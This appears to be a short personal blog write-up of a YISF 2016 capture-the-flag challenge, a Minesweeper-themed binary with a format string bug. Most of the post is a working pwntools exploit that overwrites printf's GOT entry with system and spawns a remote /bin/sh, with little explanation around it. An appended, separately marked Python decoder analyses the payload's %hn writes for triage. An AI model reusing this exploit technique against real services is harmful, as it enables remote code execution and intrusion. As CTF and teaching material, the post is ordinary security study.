
cdor1's lab

YISF 2016 bugmine

Cdor1 2017. 2. 15. 18:42

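Write-up: While cleaning up my Ubuntu machine, I found a 100-point challenge that I solved a long time ago in the YISF qualifiers, so I'm posting it.

It was an FSB (format string bug) challenge themed on Minesweeper.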


from pwn import *
s = remote('112.166.114.136',38961)

payload = ""
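payload += p32(0x0804c012) # printf GOT + 2 (upper 16 bits), written by %3$hn
payload += p32(0x0804c010) # printf GOT (lower 16 bits), written by %4$hn
# 8 address bytes + 2044 = 0x0804 for the first %hn; 32140 more = 0x8590 for the second
payload += "%"+"2044"+"c"+"%3$hn"+"%"+"32140"+"c"+"%4$hn"
payload += ";/bin/sh" # get shell after FSB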

print s.recvuntil('$') 
s.sendline('1') 

print s.recvuntil('$')
s.sendline('1')

for i in range (0,5): # Go to register routine
	print s.recvuntil('$')
	s.sendline('1')
	print s.recvuntil('$')
	s.sendline('3 3')
	sleep(0.2)

print s.recvuntil(':')
s.sendline(payload) # send Payload
s.recvline('$')

s.sendline('2') # FSB printf_got -> system_plt
s.recvline('$') 
s.sendline('2') # system("/bin/sh")

s.interactive() # Enjoy :)
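
Added example (not part of the original post): a small Python 3 decoder that reads the format-string payload above and reports which addresses and values its `%hn` conversions write, which is useful when triaging a captured payload. It assumes a 32-bit little-endian target and that printf argument 3 maps to the first 4 bytes of the buffer, as the post's `%3$hn` implies; `decode_writes` and `patched_u32` are hypothetical names.

```python
import re
import struct

# Payload bytes rebuilt from the values in the post (Python 3 bytes, no pwntools).
PAYLOAD = (struct.pack("<I", 0x0804C012) + struct.pack("<I", 0x0804C010)
           + b"%2044c%3$hn%32140c%4$hn" + b";/bin/sh")

# Handles %<width>c padding and %<k>$n / %<k>$hn / %<k>$hhn writes only.
SPEC = re.compile(rb"%(?:(\d+)\$)?(\d*)(hhn|hn|n|c)")
SIZE = {b"hhn": 1, b"hn": 2, b"n": 4}

def decode_writes(payload, first_arg=3, word=4):
    """Return [(address, size, value)] for each %n-family write.

    first_arg is the printf argument index that maps to payload[0:word];
    3 is an assumption taken from the post's %3$hn.
    """
    writes, printed, pos = [], 0, 0
    while pos < len(payload) and payload[pos] != 0:   # printf stops at NUL
        m = SPEC.match(payload, pos)
        if m is None:
            printed, pos = printed + 1, pos + 1       # literal byte is echoed
            continue
        arg, width, conv = m.groups()
        if conv == b"c":
            printed += max(int(width or 1), 1)
        else:
            off = (int(arg) - first_arg) * word if arg else -1
            if off < 0 or off + word > len(payload):
                raise ValueError("write target is outside the payload")
            addr = struct.unpack_from("<I", payload, off)[0]
            size = SIZE[conv]
            writes.append((addr, size, printed % (1 << (8 * size))))
        pos = m.end()
    return writes

def patched_u32(writes, addr):
    """Apply the writes to a sparse byte map and read the 32-bit word at addr."""
    mem = {}
    for a, size, value in writes:
        for i, b in enumerate(value.to_bytes(size, "little")):
            mem[a + i] = b
    return int.from_bytes(bytes(mem[addr + i] for i in range(4)), "little")

if __name__ == "__main__":
    ws = decode_writes(PAYLOAD)
    for a, size, value in ws:
        print(f"{size}-byte write of {value:#06x} to {a:#010x}")
    print(f"word at 0x0804c010 becomes {patched_u32(ws, 0x0804C010):#010x}")
```

The decoded word is the value the post's comment describes as replacing the printf GOT entry with system_plt.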
